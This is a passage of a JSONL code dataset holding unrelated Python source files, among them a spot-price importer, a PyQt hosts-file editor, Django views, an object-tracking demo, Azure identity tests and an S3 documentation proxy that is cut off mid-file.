self.namespace,\n self.selectorLabel,\n self.containerName,\n self.image,\n annotations_value,\n envs_value,\n volumeMountsYaml,\n volumesYaml,\n self.imagePullSecret,\n self.nodeTag,\n securityContext,\n self.livenessProbeTemplate))\n return\n","sub_path":"deploy-script/k8s/deploymentYaml.py","file_name":"deploymentYaml.py","file_ext":"py","file_size_in_byte":5516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"254371954","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''现货数据导入器'''\n# 从万德导入现货数据到数据仓库\n#\n# Created by Shengying Pan, 2016\nimport dateutil.parser\nimport asyncio\nimport aiohttp\nimport json\n\nfrom datetime import datetime\nfrom datetime import timedelta\n\nfrom importererrors import WindError\nfrom importererrors import ServerError\nfrom serverutilities import get_classification\nfrom serverutilities import create_classification_for_product\nfrom serverutilities import get_last_day\nfrom windutilities import get_spot_quotes\n\nclass SpotImporter:\n '''class to import spot data'''\n def __init__(self, loop, wind, config):\n '''constructor'''\n self.loop = loop\n self.wind = wind\n self.config = config\n def run(self):\n '''main function to import data'''\n print('处理产品现货价格')\n today = datetime.now()\n print('今天是', today.strftime('%Y-%m-%d'))\n assets = self.config['spots']['国内现货日价格']\n for asset in dict.keys(assets):\n print('处理品种' + asset)\n items = assets[asset]\n tasks = []\n for item in items:\n tasks.append(asyncio.ensure_future(self.process_item('国内现货日价格', asset, item)))\n try:\n self.loop.run_until_complete(asyncio.wait(tasks))\n except:\n print('循环产生异常:正在处理产品' + asset + '国内现货价格数据')\n\n assets = self.config['spots']['国外现货日价格']\n for asset in dict.keys(assets):\n print('处理品种' + asset)\n items = assets[asset]\n tasks = []\n for item in items:\n tasks.append(asyncio.ensure_future(self.process_item('国外现货日价格', asset, item)))\n try:\n self.loop.run_until_complete(asyncio.wait(tasks))\n except:\n print('循环产生异常:正在处理产品' + asset + '国外现货价格数据')\n\n async def upload_item(self, asset, item):\n '''this function upload the spot quotes of a product'''\n item_name = asset + item['origin'] + item['specs']\n last_day = None\n try:\n last_day = await get_last_day('spot', item['wind_id'], self.config)\n except ServerError as err:\n raise err\n\n\n today = datetime.now().strftime('%Y-%m-%d')\n start_date = self.config['spots']['start']\n\n if last_day is not None:\n one_day = timedelta(days=1)\n start_date = (last_day + one_day).strftime('%Y-%m-%d')\n\n data = None\n try:\n data = await get_spot_quotes(item['wind_id'], start_date, today, self.wind)\n except WindError as err:\n raise err\n\n with aiohttp.ClientSession() as session:\n url = self.config['server']['urls']['base']\n url = url + self.config['server']['urls']['spot'] + '/' + item['wind_id']\n params = {'jwt': self.config['user']['jwt']}\n headers = {'content-type': 'application/json'}\n payload = {\n 'wind': data\n }\n response = None\n result = None\n status = None\n try:\n response = await session.post(url, params=params, \\\n headers=headers, data=json.dumps(payload))\n result = await response.json()\n status = response.status\n except:\n raise ServerError(-1, '无法连接数据库服务')\n finally:\n if response is not None:\n response.release()\n\n if status > 200:\n message = '产品' + item_name + '数据上传失败,错误:' + \\\n json.dumps(result)\n raise ServerError(status, message)\n else:\n print('产品' + item_name + '数据上传完成,服务器返回' + json.dumps(result))\n return True\n\n\n async def process_item(self, keyword, asset, item):\n '''process a single item'''\n item_name = asset + item['origin'] + item['specs']\n print('开始处理产品' + item_name)\n classification = None\n try:\n classification = await get_classification(item['wind_id'], self.config)\n except ServerError as err:\n print('访问产品' + item_name + '分类信息失败:' + str(err))\n return False\n\n if classification is None:\n try:\n classification = await create_classification_for_product(keyword, asset, item, self.config)\n except ServerError as err:\n print('创建产品' + item_name + '分类信息失败:' + str(err))\n return False\n\n try:\n return await self.upload_item(asset, item)\n except ServerError as err:\n print('产品' + item_name + '现货价格上传失败: ' + str(err))\n return False\n except WindError as err:\n print('产品' + item_name + '获取万德数据失败:' + str(err))\n return False\n\n return True","sub_path":"importer/spotimporter.py","file_name":"spotimporter.py","file_ext":"py","file_size_in_byte":5206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"426343773","text":"# Dec 28\nimport numpy as np\n# Enter with spaces\nm, n = map(int, input(\"Enter number of rows and columns \").split())\nflag = True\nmat = np.zeros((m, n), dtype=int)\nfor i in range(m):\n for j in range(n):\n mat[i, j] = int(input())\nfor i in range(m-1):\n for j in range(n-1):\n if mat[i, j] != mat[i+1, j+1]:\n flag = False\n break\n if not flag:\n break\nprint(mat)\nif flag:\n print(\"Identical diagonals\")\nelse:\n print(\"Diagonals are non-identical\")\n\n# SAMPLE I/O\n# Enter number of rows and columns 3 4\n# 7\n# 4\n# 6\n# 8\n# 1\n# 7\n# 4\n# 6\n# 9\n# 1\n# 7\n# 4\n# [[7 4 6 8]\n# [1 7 4 6]\n# [9 1 7 4]]\n# Identical diagonals\n","sub_path":"December-28/python_drstrange11.py","file_name":"python_drstrange11.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"569856353","text":"from PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import *\nimport sys\nimport os\nfrom main1 import Ui_MainWindow\nfrom PyQt5.QtCore import pyqtSignal\nfrom excluded import Excluded\n\n\nclass MyApp(QtWidgets.QMainWindow):\n excludes = pyqtSignal(list)\n global HOST\n\n if sys.platform.startswith('linux') or sys.platform == 'darwin':\n HOST = \"/etc/hosts\"\n else:\n HOST = \"C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts\"\n\n def __init__(self):\n super(MyApp, self).__init__()\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.window = Excluded(self.excludes)\n self.init_ui()\n self.ui.addBtn.clicked.connect(self.add_host)\n self.ui.deleteBtn.clicked.connect(self.delete_host)\n self.ui.excludeBtn.clicked.connect(self.exclude_host)\n self.ui.removeFromExclude.clicked.connect(self.open_excludes)\n self.window.includes[list].connect(self.init_ui)\n\n def init_ui(self):\n self.setFixedSize(475, 372)\n self.setWindowTitle('Host Reader')\n lines = []\n exists = os.path.isfile('hosts.bak')\n if not exists:\n with open(HOST, 'r') as f:\n back_up = f.readlines()\n for backUpLine in back_up:\n with open('hosts.bak', 'a') as w:\n w.write(backUpLine)\n with open(HOST, 'r') as hr:\n items = hr.readlines()\n for line in items:\n if len(line) == 1 and line.find('\\n') != -1:\n continue\n elif line.startswith('#'):\n continue\n elif line.find('\\n') == -1:\n line += '\\n'\n lines.append(line)\n\n self.ui.hostBrowser.clear()\n self.ui.hostBrowser.setSelectionMode(QListWidget.ExtendedSelection)\n self.ui.hostBrowser.addItems(lines)\n self.ui.hostBrowser.scrollToBottom()\n self.ui.hostBrowser.show()\n self.show()\n\n def open_excludes(self):\n self.window.show()\n\n def add_host(self):\n text = self.ui.hostEditor.toPlainText()\n with open(HOST, 'a') as f:\n f.write(text + '\\n')\n for line in text.split('\\n'):\n self.ui.hostBrowser.addItem(line + '\\n')\n self.ui.hostEditor.clear()\n self.ui.hostBrowser.scrollToBottom()\n self.ui.hostBrowser.show()\n\n def exclude_host(self):\n list_items = self.ui.hostBrowser.selectedItems()\n if not list_items: return\n exclude_list = []\n for item in list_items:\n with open(HOST, 'r') as f:\n host_lines = f.readlines()\n with open(HOST, 'w') as f:\n for hostLine in host_lines:\n if hostLine.strip('\\n') == item.text().strip('\\n'):\n f.write('#HE ' + hostLine)\n else:\n f.write(hostLine)\n exclude_list.append(item.text())\n self.ui.hostBrowser.takeItem(self.ui.hostBrowser.row(item))\n self.excludes.emit(exclude_list)\n\n def delete_host(self):\n list_items = self.ui.hostBrowser.selectedItems()\n if not list_items: return\n for item in list_items:\n print(item.text())\n with open(HOST, 'r') as f:\n host_lines = f.readlines()\n with open(HOST, 'w') as f:\n for line in host_lines:\n if line.strip(\"\\n\") != item.text().strip(\"\\n\"):\n f.write(line)\n self.ui.hostBrowser.takeItem(self.ui.hostBrowser.row(item))\n self.ui.hostBrowser.scrollToBottom()\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n window = MyApp()\n window.show()\n sys.exit(app.exec_())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"3284347","text":"from rencode import dumps, loads\r\n\r\nclass states:\r\n\t'''states used by the server / client\r\n\t'''\r\n\t\r\n\tstates = {\r\n\t'new_connection':0,\r\n\t'remove_connection':1,\r\n\t'limit_connection':2,\r\n\t'ping_connection':3,\r\n\t'established_connection':4,\r\n\t\t\t} \r\n\t\r\nclass rpcCommands:\r\n\tpermitted_commands = {\r\n\t\t'print' : 'print({})',\r\n\t\t'update' : '#send client names',\r\n\t\t'pause' : None,\t\t\t\t\r\n\t\t\t\t\t\t}\r\n\t\r\n\tdef execute(command):\r\n\t\tpass\r\n\t\r\nclass entity:\r\n\t'''a client entity\r\n\t'''\r\n\tdef __init__(self, name, cid, ip, timeout):\r\n\t\tself.name = name\r\n\t\tself.cid = cid\r\n\t\tself.ip = ip\r\n\t\tself.timeout = timeout #0 is the time last received, #1 is the difference\r\n\t\tself.latency = [0, 100, 100]\r\n\t\t\t\r\nclass packer:\r\n\t'''how data is packed / unpacked\r\n\t'''\r\n\r\n\tdef pack(data):\r\n\t\t'''packs data for socket\r\n\t\t'''\r\n\t\treturn dumps(data)\r\n\t\t\t\r\n\tdef unpack(data):\r\n\t\t'''unpacks data from socket\r\n\t\t'''\r\n\t\treturn loads(data)","sub_path":"3/blender/Multiplayer/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"76055644","text":"#declarar\ncliente=\"\"\nproducto=\"\"\ncantidad=0\ncostodeunidad=0.0\ncliente=str(input(\"ingrese nombre del cliente:\"))\nproducto=str(input(\"ingrese nombre del producto:\"))\ncantidad=int(input(\"ingrese cantidad:\"))\ncostodeunidad=float(input(\"ingrese el costo de uniudad:\"))\n#procesing\ntotal=cantidad*costodeunidad\nif(total>150000):\n print(\"comprador exigente\")\nelse:\n print(\"no es comprador exigente \")\n#fin-if\n","sub_path":"rojas_baturen/EJERCICIO047.py","file_name":"EJERCICIO047.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"494110353","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n\nimport logging\nimport os\nimport os.path as osp\nfrom opts import opts\nfrom tracking_utils.utils import mkdir_if_missing\nfrom tracking_utils.log import logger\nimport dataloader as datasets\nimport torch\nimport cv2\nfrom tracker.multitrackercam4 import JDETracker\nfrom tracking_utils.timer import Timer\nfrom tracking_utils import visualization as vis\nfrom PIL import Image\nfrom utils.bb_polygon import load_zone_anno\nimport numpy as np\nimport copy\ndef eval_seq(opt, dataloader,polygon, paths, data_type, result_filename, frame_dir=None,save_dir=None,bbox_dir=None, show_image=True, frame_rate=30):\n count=0\n if save_dir:\n mkdir_if_missing(save_dir)\n if bbox_dir:\n mkdir_if_missing(bbox_dir)\n if frame_dir:\n mkdir_if_missing(frame_dir)\n tracker = JDETracker(opt,polygon, paths, frame_rate=frame_rate)\n timer = Timer()\n results = []\n frame_id = 1\n \n f = open(opt.input_video.split('/')[-1][:-4] + '.txt', 'w' )\n\n for path, img, img0 in dataloader:\n img0_clone=copy.copy(img0)\n if frame_id % 1 == 0:\n logger.info('Processing frame {} ({:.2f} fps)'.format(frame_id, 1. / max(1e-5, timer.average_time)))\n \n\n # run tracking\n timer.tic()\n blob = torch.from_numpy(img).cuda().unsqueeze(0) if opt.gpus[0]>=0 else torch.from_numpy(img).cpu().unsqueeze(0)\n online_targets,detection_boxes,out_of_polygon_tracklet = tracker.update(blob, img0)\n if len(out_of_polygon_tracklet)>0:\n for track in np.asarray(out_of_polygon_tracklet)[:,2]:\n if track in ['person','bicycle', 'motorcycle']:\n count+=1\n print('count : '+str(count))\n online_tlwhs = []\n online_ids = []\n \n for t in online_targets:\n tlwh = t.tlwh\n tid = t.track_id\n if tlwh[2] * tlwh[3] > opt.min_box_area :\n online_tlwhs.append(tlwh)\n online_ids.append(tid)\n \n #bbox detection plot \n box_tlbrs=[]\n box_scores=[]\n box_classes=[]\n box_occlusions=[]\n img_bbox=img0.copy()\n for box in detection_boxes:\n tlbr=box.tlbr\n tlwh=box.tlwh\n vertical = tlwh[2] / tlwh[3] > 1.6\n if tlwh[2] * tlwh[3] > opt.min_box_area:\n box_tlbrs.append(tlbr)\n box_scores.append(box.score)\n box_classes.append(box.infer_type())\n box_occlusions.append('occ' if box.occlusion_status==True else 'non_occ')\n\n timer.toc()\n # save results\n for track in out_of_polygon_tracklet:\n frame_idx,id,classes,movement=track\n results.append((opt.input_video.split('/')[-1][:-4],frame_idx , classes, movement))\n f.write(','.join([opt.input_video.split('/')[-1][:-4], str(frame_idx), str(classes), str(movement)])+ '\\n')\n if show_image or save_dir is not None:\n online_im = vis.plot_tracking(img0, online_tlwhs, online_ids, frame_id=frame_id,\n fps=1. / timer.average_time,out_track=out_of_polygon_tracklet)\n bbox_im=vis.plot_detections(img_bbox,box_tlbrs,scores=box_scores,box_occlusion=None,btypes=box_classes)\n if show_image:\n cv2.polylines(online_im,[np.asarray(polygon)],True,(0,255,255))\n cv2.polylines(bbox_im,[np.asarray(polygon)],True,(0,255,255))\n cv2.polylines(img0_clone,[np.asarray(polygon)],True,(0,255,255))\n cv2.imshow('online_im', online_im)\n cv2.imshow('bbox_im',bbox_im)\n if save_dir is not None:\n cv2.polylines(online_im,[np.asarray(polygon)],True,(0,255,255))\n cv2.polylines(bbox_im,[np.asarray(polygon)],True,(0,255,255))\n cv2.polylines(img0_clone,[np.asarray(polygon)],True,(0,255,255))\n cv2.imwrite(os.path.join(save_dir, '{:05d}.jpg'.format(frame_id)), online_im)\n cv2.imwrite(os.path.join(bbox_dir, '{:05d}.jpg'.format(frame_id)), bbox_im)\n cv2.imwrite(os.path.join(frame_dir, '{:05d}.jpg'.format(frame_id)),img0_clone)\n\n frame_id += 1\n # save results\n \n return frame_id, timer.average_time, timer.calls\n\ndef demo(opt):\n result_root = opt.output_root if opt.output_root != '' else '.'\n mkdir_if_missing(result_root)\n\n logger.info('Starting tracking...')\n dataloader = datasets.LoadVideo(opt.input_video, opt.img_size)\n polygon, paths=load_zone_anno(opt.input_meta)\n result_filename = os.path.join(result_root, 'results.txt')\n frame_rate = dataloader.frame_rate\n\n frame_tracking_dir = None if opt.output_format == 'text' else osp.join(result_root, 'frame_tracking')\n bbox_dir = None if opt.output_format == 'text' else osp.join(result_root, 'bbox_detection')\n frame_dir = None if opt.output_format == 'text' else osp.join(result_root, 'frame_dir')\n eval_seq(opt, dataloader,polygon, paths, 'mot', result_filename, frame_dir=frame_dir,save_dir=frame_tracking_dir,bbox_dir=bbox_dir, show_image=False, frame_rate=frame_rate)\n\n if opt.output_format == 'video':\n output_video_path = osp.join(result_root, 'result.mp4')\n cmd_str = 'ffmpeg -f image2 -i {}/%05d.jpg -b 5000k -c:v mpeg4 {}'.format(osp.join(result_root, 'frame'), output_video_path)\n os.system(cmd_str)\n\n\nif __name__ == '__main__':\n opt = opts().init()\n demo(opt)\n","sub_path":"HCMAICITYCHALLENGE/counting_demo.py","file_name":"counting_demo.py","file_ext":"py","file_size_in_byte":5528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"519863717","text":"\"\"\"\nThis module implements basic input data scheme.\n\"\"\"\n\nfrom Tkinter import *\nfrom vyapp.app import root\n\nclass Ask(Entry):\n \"\"\"\n This class implements vy default input text scheme. Plugins that demand user input\n could use this class to retrieve user's data in a consistent way. When this class constructor\n is called it shows an entry widget at the bottom of the vy editor.\n\n This widget takes the focus when the constructor is called. It is a useful\n behavior in the common scenaries of vy editor.\n\n When user presses the widget is destroyed and the focus scheme\n is restored. The same occurs when is pressed while the widget has focus.\n\n Consider:\n \n def handle(area):\n ask = Ask(area)\n if ask.data:\n print 'Success!'\n else:\n print 'Failure!'\n\n In case of success it is if the user pressed then ask.data will be the user data\n that was inputed otherwise it is ''.\n \"\"\"\n\n def __init__(self, area, default_data ='', wait=True):\n self.area = area\n self.data = '' \n self.frame = Frame(root.read_data, border=1, padx=3, pady=3)\n self.frame.pack(expand=True, fill=X)\n \n Entry.__init__(self, self.frame)\n self.config(background='grey')\n\n self.pack(side='left', expand=True, fill=BOTH)\n self.focus_set()\n\n self.bind('', lambda event: self.restore_focus_scheme())\n self.bind('', lambda event: self.on_success())\n\n # It seems that if i put self.data = default_data\n # after self.area.wait_window(self) it sets self.data\n # after it has being set in self.ok then i get\n # the insert mark being reset to insert again.\n\n self.insert('end', default_data)\n root.read_data.pack(fill=X)\n\n # It has to wait for self.frame otherwise it seems the marks\n # added by Stdout, the code_mark stuff disappear.\n # this was insanely crazy to find.\n self.frame.grab_set()\n if wait: self.area.wait_window(self.frame)\n\n def on_success(self):\n self.data = self.get()\n self.restore_focus_scheme()\n\n def restore_focus_scheme(self):\n self.frame.destroy()\n root.read_data.pack_forget()\n self.area.focus_set()\n\n\n","sub_path":"vy-code/vyapp/ask.py","file_name":"ask.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"192823179","text":"# ------------------------------------\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n# ------------------------------------\nfrom unittest import mock\n\nfrom azure.core.exceptions import HttpResponseError\nfrom azure.identity.aio._credentials.managed_identity import ImdsCredential\nimport pytest\n\nfrom helpers import mock_response\nfrom helpers_async import AsyncMockTransport, get_completed_future\n\n\n@pytest.mark.asyncio\nasync def test_no_scopes():\n \"\"\"The credential should raise ValueError when get_token is called with no scopes\"\"\"\n\n successful_probe = mock_response(status_code=400, json_payload={})\n transport = mock.Mock(send=mock.Mock(return_value=get_completed_future(successful_probe)))\n credential = ImdsCredential(transport=transport)\n\n with pytest.raises(ValueError):\n await credential.get_token()\n\n\n@pytest.mark.asyncio\nasync def test_multiple_scopes():\n \"\"\"The credential should raise ValueError when get_token is called with more than one scope\"\"\"\n\n successful_probe = mock_response(status_code=400, json_payload={})\n transport = mock.Mock(send=mock.Mock(return_value=get_completed_future(successful_probe)))\n credential = ImdsCredential(transport=transport)\n\n with pytest.raises(ValueError):\n await credential.get_token(\"one scope\", \"and another\")\n\n\n@pytest.mark.asyncio\nasync def test_imds_close():\n transport = AsyncMockTransport()\n\n credential = ImdsCredential(transport=transport)\n\n await credential.close()\n\n assert transport.__aexit__.call_count == 1\n\n\n@pytest.mark.asyncio\nasync def test_imds_context_manager():\n transport = AsyncMockTransport()\n credential = ImdsCredential(transport=transport)\n\n async with credential:\n pass\n\n assert transport.__aexit__.call_count == 1\n","sub_path":"sdk/identity/azure-identity/tests/test_imds_credential_async.py","file_name":"test_imds_credential_async.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"180031956","text":"# -*- coding: utf-8 -*- #\n# Copyright 2023 Google LLC. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Common classes and functions for organization firewall policy associations.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.calliope import exceptions as calliope_exceptions\n\n\ndef ConvertPriorityToInt(priority):\n try:\n int_priority = int(priority)\n except ValueError:\n raise calliope_exceptions.InvalidArgumentException(\n 'priority', 'priority must be a valid non-negative integer.'\n )\n if int_priority < 0:\n raise calliope_exceptions.InvalidArgumentException(\n 'priority', 'priority must be a valid non-negative integer.'\n )\n return int_priority\n","sub_path":"lib/googlecloudsdk/api_lib/compute/firewall_policy_association_utils.py","file_name":"firewall_policy_association_utils.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"383793517","text":"from django.shortcuts import render\nfrom django.shortcuts import render_to_response\nfrom django.http import HttpResponse\nfrom django.template.loader import get_template\nfrom django.template import Context\nfrom mdata.models import Mdata\nfrom django.http import HttpResponseRedirect\nfrom django.core.context_processors import csrf\nfrom mdata.forms import MdataForm\n# Create your views here.\n\ndef hello(request):\n name = \"Priyank Jain\"\n html = \" Hi %s, This seems to have worked \" % name\n return HttpResponse(html)\n\ndef hello_template(request):\n name = \"Priyank\"\n t = get_template('hello.html')\n html = t.render(Context ({'name' : name }))\n return HttpResponse(html)\n \ndef hello_template_simple(request):\n name = \"Priyank\"\n return render_to_response('hello.html',{'name' : name})\n \ndef mdatas(request):\n language = 'en_us'\n session_language ='en_us'\n if 'lang' in request.COOKIES:\n language = request.COOKIES['lang']\n\n if 'lang' in request.session:\n session_language = request.session['lang']\n \n args = {}\n args.update(csrf(request))\n \n args['mdatas'] = Mdata.objects.all()\n args['language'] = language\n args['session_language'] = session_language\n \n return render_to_response('mdatas.html', args)\n \ndef mdata(request,mdata_id=1):\n return render_to_response('mdata.html',{'mdata' : Mdata.objects.get(id=mdata_id)})\n\ndef language(request, language='en-us'):\n response = HttpResponse(\"setting language to %s\" % langauge)\n response.set_cookie('lang', language)\n request.session['lang'] = language\n return repsonse\n\ndef create(request):\n if request.POST:\n form = MdataForm(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect('/moviesdata/all')\n else:\n form = MdataForm()\n c={}\n c.update(csrf(request))\n c['form'] = form\n return render_to_response('create_mdata.html', c)\n \ndef search_titles(request):\n if request.method == \"POST\":\n search_text = request.POST['search_text']\n else:\n search_text = 'Cabiria'\n \n mdatas = Mdata.objects.filter(name__contains=search_text)\n \n return render_to_response('ajax_search.html', {'mdatas' : mdatas})","sub_path":"movies/mdata/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"582677961","text":"x = [0.30, 0.60, 0.10]\ny = [0.40, 0.10, 0.50]\n\ntotal = 0\nfor i in range(len(x)):\n total += x[i]*y[i]\nprint(total)\n\nn = len(x)\nprint(x)\nfor i in range(n // 2):\n temp = x[i]\n x[i] = x[n-1-i]\n x[n-1-i] = temp\nprint(x)\n\n# iterating over the elements in an array in a[] without\n# referring to the indices explicity. \ntotal = 0\nfor v in y:\n total += v\naverage = total / len(y)\nprint(total)\n\nprint()\nprint(y)\nprint(sum(y))\n\n\n# Create arrays in Python\na = []\nfor i in range(n):\n a += [0.0]\n \na = [0.0]*3\n\n","sub_path":"introCS/python/array.py","file_name":"array.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"541447937","text":"\"\"\"\n Chapter 4: Trees and Graph\n Question 2: Minimal Tree\n\"\"\"\n\nimport networkx as nx\nimport pdb\nimport random\nfrom collections import defaultdict\nimport matplotlib.pyplot as plt\n\nclass TreeNode:\n def __init__(self, val):\n self.value = val\n self.left = None\n self.right = None\n\ndef build_bst(array):\n n = len(array)\n if n == 0:\n return None\n middle = n//2\n node = TreeNode(array[middle])\n node.left = build_bst(array[:middle])\n node.right = build_bst(array[middle+1:])\n return node\n\ndef graph_from_tree(node, graph):\n if node:\n if not graph:\n graph = defaultdict(set)\n if node.left:\n graph[node.value].add(node.left.value)\n graph_from_tree(node.left, graph)\n if node.right:\n graph[node.value].add(node.right.value)\n graph_from_tree(node.right, graph)\n return graph\n\ndef visualise_graph(graph):\n G = nx.Graph()\n for source in graph:\n for target in graph[source]:\n G.add_edges_from([(source, target)])\n nx.draw(G, with_labels=True, node_color=\"red\")\n plt.axis('off')\n plt.show()\n\nif __name__ == \"__main__\":\n array = [i for i in range(2**4-1)]\n tree = build_bst(array)\n graph = graph_from_tree(tree, None)\n visualise_graph(graph)\n","sub_path":"Chapter04/02_MinimalTree/minimal_tree.py","file_name":"minimal_tree.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"593859497","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n\turl(r'^reminders/list/$', views.reminders_list, name='reminders_list'),\n\turl(r'^reminder/(?P[\\d]+)/$', views.reminder_item, name='reminder_item'),\n\n\turl(r'^add/reminder/$', views.add_reminder, name='add_reminder'),\n\turl(r'^edit/reminder/(?P[\\d]+)/$', views.edit_reminder, name='edit_reminder'),\n\turl(r'^additional/reminder/(?P[\\d]+)/$', views.additional_reminder, name='additional_reminder'),\n\turl(r'^delete/reminder/(?P[\\d]+)/$', views.delete_reminder, name='delete_reminder'),\n\n\turl(r'^notification/reminders/$', views.notification_reminders, name='notification_reminders'),\n]\n","sub_path":"apps/reminders/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"37225854","text":"# coding: utf-8\nfrom django.shortcuts import render, get_object_or_404\n\n# Create your views here.\nfrom marketing.forms import EmailForm\nfrom marketing.models import MarketingMessage, Slider\n\nfrom .models import Product,ProductImage\n\n#검색창\ndef search(request):\n\t#print request 처음에 print시켜서 request형태를 보고 문법을 만든다\n\t#검색한 것이 있느냐?\n\ttry:\n\t\tq = request.GET.get('q')\n\texcept:\n\t\tq = None\n\t#있다면\n\tif q:\n\t\tproducts = Product.objects.filter(title__icontains=q) #title__icontains 는 title안에 포함되어 있기만 해도 된다는 뜻\n\t\ttemplate = 'products/results.html'\n\t\tcontext = {'query': q, 'products': products }\n\telse:\n\t\ttemplate = 'products/home.html'\n\t\tcontext = {}\n\treturn render(request, template, context)\n\n#홈페이지\ndef home(request):\n\tsliders = Slider.objects.all_featured() #class slider의 objects = MarketingManager()을 통해서 함수 정의\n\tproducts = Product.objects.all()\n\ttemplate = 'products/home.html'\n\tcontext = {\n\t\t'products': products,\n\t\t'sliders': sliders,\n\t\t}\n\treturn render(request, template, context)\n\n#전체상품\ndef all(request):\n\tproducts = Product.objects.all()\n\ttemplate = 'products/all.html'\n\tcontext = {'products': products}\n\treturn render(request, template, context)\n\n#개별상품 상세페이지\ndef single(request, slug):\t\n\tproduct = get_object_or_404(Product, slug=slug) # 없으면 404페이지 띄우고, 있으면 get하고 \n\timages = ProductImage.objects.filter(product=product) # 동일한 뜻 images = product.productimage_set.all()\n\ttemplate = 'products/single.html'\n\tcontext = {'product': product, 'images': images }\n\treturn render(request, template, context)","sub_path":"src/products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"377099202","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\n\n# In this class, the files are .npy files stored with numpy ndarray\n# Note that there is no class_num\nclass attrdataset(object):\n\tdef __init__(self, train_file_name, val_file_name, test_file_name):\n\t\tself.train_X = self.get_X(train_file_name)\n\t\tself.val_X = self.get_X(val_file_name)\n\t\tself.test_X = self.get_X(test_file_name)\n\n\n\tdef get_X(self, file_name):\n\t\tX = np.load(file_name)\n\t\treturn X.astype(np.float32)\n\n\n\t\"\"\"\n\tdef initialize_batch(self):\n\t\tpass\n\t\"\"\"\n\n\n\t# Assert: there is next batch\n\tdef next_batch(self, dataset_name, index_vector):\n\t\tif dataset_name == \"train\" or dataset_name == \"train_init\":\n\t\t\toutput_X = self.train_X[index_vector, :]\n\t\telif dataset_name == \"val\":\n\t\t\toutput_X = self.val_X[index_vector, :]\n\t\telif dataset_name == \"test\":\n\t\t\toutput_X = self.test_X[index_vector, :]\n\n\t\treturn output_X\n","sub_path":"code/archive/attrdataset.py","file_name":"attrdataset.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"49767819","text":"import mimetypes\nimport os\n\nfrom boto.exception import S3ResponseError\nfrom boto.s3.connection import S3Connection\nfrom pyramid.config import Configurator\nfrom pyramid.httpexceptions import HTTPMovedPermanently, HTTPNotFound\nfrom pyramid.response import Response, FileIter\nfrom tomb_routes import simple_route\n\n\n@simple_route(\"/{path:.*}\")\ndef my_route(request, path):\n if not path:\n path = \"/\"\n\n if path.endswith(\"/\"):\n path += \"index.html\"\n\n try:\n key = request.s3.get_key(path)\n except S3ResponseError:\n # Try the same request, but with a /index.html added onto it.\n try:\n key = request.s3.get_key(path + \"/index.html\")\n except S3ResponseError:\n return HTTPNotFound()\n else:\n return HTTPMovedPermanently(\"/\" + path + \"/\")\n\n key.open_read()\n content_type, content_encoding = mimetypes.guess_type(path)\n\n return Response(\n app_iter=key,\n content_type=content_type,\n content_encoding=content_encoding,\n )\n\n\ndef _get_bucket(request):\n conn = request.registry.s3_conn\n bucket = conn.get_bucket(request.registry.s3_bucket, validate=False)\n return bucket\n\n\nconfig = Configurator()\nconfig.registry.s3_conn = S3Connection(anon=True)\nconfig.registry.s3_bucket = os.environ[\"DOCS_PROXY_BUCKET\"]\nconfig.add_request_method(_get_bucket, name=\"s3\", reify=True)\nconfig.scan()\n\napplication = 